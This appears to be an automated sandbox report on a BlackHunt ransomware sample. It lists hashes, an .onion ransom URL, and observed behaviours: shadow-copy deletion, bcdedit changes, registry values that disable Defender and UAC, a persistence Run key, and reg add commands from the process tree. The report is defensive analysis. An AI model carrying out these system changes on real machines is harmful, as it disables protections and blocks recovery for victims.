Analysis
-
max time kernel
154s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:22
Static task
static1
Behavioral task
behavioral1
Sample
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe
Resource
win10v2004-20231215-en
General
-
Target
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe
-
Size
707KB
-
MD5
d5980d070ff74bb810fb95cd21332ae2
-
SHA1
73d0f26f3a2100605765d991456090392e157a63
-
SHA256
f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e
-
SHA512
56eddd4dc0b9a9bc5c8ca5178935a6ea4f6b487f28120c6956e5b1879cb4e91a4fea1db06e32afeadaaa62047f8e0938c99ac0a4ec3260f85c8c90fec67f1f88
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1V8nvnh:6uaTmkZJ+naie5OTamgEoKxLW4vh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4036 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4660 bcdedit.exe 1472 bcdedit.exe -
Renames multiple (513) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2552 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\Y: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\O: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\S: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\J: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\Z: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\I: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\M: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\U: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\X: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\Q: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\G: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\K: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\V: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\B: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\W: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\H: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\P: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\A: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\L: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\R: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened (read-only) \??\N: f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jpeg.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\LICENSE f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xmlresolver.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\resources.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\fontconfig.properties.src f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\icu.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\hijrah-config-umalqura.properties f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\cldr.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\public_suffix_list.dat f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\pkcs11wrapper.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngdatatype.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\US_export_policy.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\zipfs.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\US_export_policy.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\lib\jfr\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkDrop32x32.gif f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\lib\management\#BlackHunt_ReadMe.hta f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Java\jre-1.8\#BlackHunt_ReadMe.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash_11-lic.gif f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jsse.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\dt.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\CIEXYZ.pf f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_ja.properties f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\currency.data f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\icu.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\cmm\PYCC.pf f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\thaidict.md f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\accessibility.properties f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management-agent.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File created C:\Program Files\Uninstall Information\#BlackHunt_Private.key f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\7-Zip\7z.sfx f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\javaws.jar f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3680 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1052 vssadmin.exe 1180 vssadmin.exe 4952 vssadmin.exe 4004 vssadmin.exe 3336 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeRestorePrivilege 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeBackupPrivilege 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeTakeOwnershipPrivilege 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeAuditPrivilege 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeSecurityPrivilege 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeIncBasePriorityPrivilege 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Token: SeBackupPrivilege 1604 vssvc.exe Token: SeRestorePrivilege 1604 vssvc.exe Token: SeAuditPrivilege 1604 vssvc.exe Token: SeBackupPrivilege 3320 wbengine.exe Token: SeRestorePrivilege 3320 wbengine.exe Token: SeSecurityPrivilege 3320 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4240 wrote to memory of 396 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 91 PID 4240 wrote to memory of 396 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 91 PID 4240 wrote to memory of 3700 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 93 PID 4240 wrote to memory of 3700 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 93 PID 4240 wrote to memory of 968 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 95 PID 4240 wrote to memory of 968 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 95 PID 4240 wrote to memory of 588 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 97 PID 4240 wrote to memory of 588 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 97 PID 396 wrote to memory of 1012 396 cmd.exe 99 PID 396 wrote to memory of 1012 396 cmd.exe 99 PID 3700 wrote to memory of 1192 3700 cmd.exe 100 PID 3700 wrote to memory of 1192 3700 cmd.exe 100 PID 4240 wrote to memory of 736 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 101 PID 4240 wrote to memory of 736 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 101 PID 968 wrote to memory of 3320 968 cmd.exe 103 PID 968 wrote to memory of 3320 968 cmd.exe 103 PID 588 wrote to memory of 2524 588 cmd.exe 104 PID 588 wrote to memory of 2524 588 cmd.exe 104 PID 736 wrote to memory of 1608 736 cmd.exe 105 PID 736 wrote to memory of 1608 736 cmd.exe 105 PID 4240 wrote to memory of 1244 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 109 PID 4240 wrote to memory of 1244 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 109 PID 4240 wrote to memory of 4720 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 111 PID 4240 wrote to memory of 4720 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 111 PID 4240 wrote to memory of 1852 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 113 PID 4240 wrote to memory of 1852 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 113 PID 4240 wrote to memory of 5080 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 115 PID 4240 wrote to memory of 5080 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 115 PID 1244 wrote to memory of 3876 1244 cmd.exe 117 PID 1244 wrote to memory of 3876 1244 cmd.exe 117 PID 4240 wrote to memory of 3560 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 118 PID 4240 wrote to memory of 3560 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 118 PID 4240 wrote to memory of 3496 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 119 PID 4240 wrote to memory of 3496 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 119 PID 4720 wrote to memory of 1788 4720 cmd.exe 122 PID 4720 wrote to memory of 1788 4720 cmd.exe 122 PID 4240 wrote to memory of 5116 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 123 PID 4240 wrote to memory of 5116 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 123 PID 4240 wrote to memory of 460 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 124 PID 4240 wrote to memory of 460 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 124 PID 4240 wrote to memory of 1640 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 128 PID 4240 wrote to memory of 1640 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 128 PID 1852 wrote to memory of 2860 1852 cmd.exe 127 PID 1852 wrote to memory of 2860 1852 cmd.exe 127 PID 5080 wrote to memory of 876 5080 cmd.exe 130 PID 5080 wrote to memory of 876 5080 cmd.exe 130 PID 4240 wrote to memory of 1444 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 133 PID 4240 wrote to memory of 1444 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 133 PID 4240 wrote to memory of 4432 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 132 PID 4240 wrote to memory of 4432 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 132 PID 3496 wrote to memory of 1480 3496 cmd.exe 134 PID 3496 wrote to memory of 1480 3496 cmd.exe 134 PID 3560 wrote to memory of 2236 3560 cmd.exe 136 PID 3560 wrote to memory of 2236 3560 cmd.exe 136 PID 4240 wrote to memory of 3520 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 137 PID 4240 wrote to memory of 3520 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 137 PID 4240 wrote to memory of 5024 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 138 PID 4240 wrote to memory of 5024 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 138 PID 4240 wrote to memory of 3164 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 141 PID 4240 wrote to memory of 3164 4240 f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe 141 PID 1640 wrote to memory of 1732 1640 cmd.exe 142 PID 1640 wrote to memory of 1732 1640 cmd.exe 142 PID 1444 wrote to memory of 1916 1444 cmd.exe 144 PID 1444 wrote to memory of 1916 1444 cmd.exe 144 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe"C:\Users\Admin\AppData\Local\Temp\f0d0781bfccd20c1caa2dbaf03edc6262983a16f94239b079eb83fa22755bb6e.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4240 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1192
-
-
-
